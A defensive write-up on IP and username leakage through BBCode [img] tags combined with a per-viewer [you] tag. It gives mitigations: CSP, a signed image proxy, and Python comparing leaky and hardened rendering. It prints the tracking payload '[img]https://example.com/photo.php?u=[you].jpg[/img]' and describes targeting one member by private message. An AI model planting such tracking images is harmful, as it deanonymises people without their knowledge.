Workaround for IP Leakage via BBCode IMG tags

[TorrentFreak](https://torrentfreak.com/private-tracker-member-data-leaked-via-bbcode-exploit-160313/) writes:

“One of the BBCodes this site uses is [you]. If you place this in a forum or a private message it will insert the user’s logon name, that is viewing the page. If my username was ‘Randomusername’, and someone sent me a private message saying ‘Hello [you]!’, when I opened it, the BBcode would translate to ‘Hello Randomusername!’”

“When you add [you] on the end of an image, you get something like this http://example.com/photo.php?u=[USERNAME_OF_PERSON_VIEWING].jpg.”

TL;DR: combine the [img] and [you] BBCodes. [you] is replaced, at render time, with the username of whoever is viewing the page, so placing it inside an image URL turns every view into a request that carries that viewer's username to a host of the poster's choosing:

[img]https://example.com/photo.php?u=[you].jpg[/img]
The viewer's browser fetches the image directly, so example.com's web server logs the username (from the URL) together with the IP address the request came from.

Private messages allow targeting a specific member even where a [you] BBCode does not exist: the attacker sends a PM containing an [img] tag that points at a URL unique to that recipient, and since only the recipient's browser ever loads it, the source IP of the request is that member's.

Workaround: either send a Content-Security-Policy header that restricts img-src to approved image hosts, or (better) proxy all [img] URLs through your own servers so the third-party host only ever sees the proxy's IP. CSP is enforced client-side, so it only protects browsers that honour it and does nothing if the attacker can upload images to an approved host; proxying is enforced server-side and removes the viewer's IP from the picture entirely. In either case the renderer should never expand [you] (or any per-viewer value) inside a URL.
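As an added example (not code from the original post or from TorrentFreak), the following Python shows the leaky render order beside a hardened one that rewrites [img] URLs through a camo-style signed proxy before expanding [you], plus the proxy-side signature check and the matching CSP header. The proxy host `img-proxy.tracker.example`, the shared secret, and the attack PM text are all constructed for the illustration.

```python
import hashlib
import hmac
import html
import re
from urllib.parse import quote, unquote

# Constructed sample: a private message written the way the attack describes.
# [you] is the forum's own "viewer's username" BBCode from the post above.
ATTACK_PM = "Hello [you]! [img]https://example.com/photo.php?u=[you].jpg[/img]"

IMG_RE = re.compile(r"\[img\](.+?)\[/img\]", re.IGNORECASE | re.DOTALL)
YOU_RE = re.compile(r"\[you\]", re.IGNORECASE)
SRC_RE = re.compile(r'src="([^"]*)"')

# Assumed deployment values (hypothetical): the proxy host and the secret it
# shares with the forum renderer so that only renderer-signed URLs are fetched.
PROXY_BASE = "https://img-proxy.tracker.example/"
PROXY_SECRET = b"rotate-me-and-keep-me-out-of-git"


def render_vulnerable(markup: str, viewer: str) -> str:
    """Leaky order: expand [you] everywhere first, then hotlink [img] as-is,
    so the viewer's name lands in a URL their own browser fetches directly."""
    expanded = YOU_RE.sub(lambda _: html.escape(viewer), markup)
    return IMG_RE.sub(lambda m: f'<img src="{m.group(1)}">', expanded)


def sign(url: str) -> str:
    return hmac.new(PROXY_SECRET, url.encode("utf-8"), hashlib.sha256).hexdigest()


def proxy_url(url: str) -> str:
    """Rewrite an [img] URL to go through the proxy. The HMAC binds the proxy to
    this exact upstream URL (no open proxy). quote(safe='') also turns '[you]'
    into '%5Byou%5D', so a later [you] substitution can never touch the URL."""
    return f"{PROXY_BASE}{sign(url)}/{quote(url, safe='')}"


def render_hardened(markup: str, viewer: str) -> str:
    """Safe order: proxy the [img] URLs first, then expand [you] in what is left.
    The upstream host sees the proxy's IP and a literal '[you]', never the viewer."""
    proxied = IMG_RE.sub(lambda m: f'<img src="{proxy_url(m.group(1))}">', markup)
    return YOU_RE.sub(lambda _: html.escape(viewer), proxied)


def proxy_accepts(signature: str, encoded_url: str) -> bool:
    """Proxy-side check, run before anything is fetched upstream."""
    return hmac.compare_digest(signature, sign(unquote(encoded_url)))


def image_sources(rendered: str) -> list:
    return SRC_RE.findall(rendered)


def leaks_viewer(rendered: str, viewer: str) -> bool:
    """True if any <img src> would carry the viewer's name, or the viewer's
    request itself, to a host other than our proxy."""
    return any(viewer in src or not src.startswith(PROXY_BASE)
               for src in image_sources(rendered))


def csp_header() -> str:
    """Defence in depth: if a renderer bug slips through, the browser still
    refuses to load images from anywhere but us and the proxy."""
    return f"default-src 'self'; img-src 'self' {PROXY_BASE.rstrip('/')}"


if __name__ == "__main__":
    for name, fn in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        out = fn(ATTACK_PM, "Randomusername")
        print(f"{name}: leaks={leaks_viewer(out, 'Randomusername')}\n  {out}")
    print("Content-Security-Policy:", csp_header())
```

The ordering in `render_hardened` is the point: the URL is signed and percent-encoded before any per-viewer substitution runs, so there is no way for a tag inside an [img] to pick up the viewer's name, and the HMAC stops the proxy from being abused as an open fetcher for arbitrary URLs.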
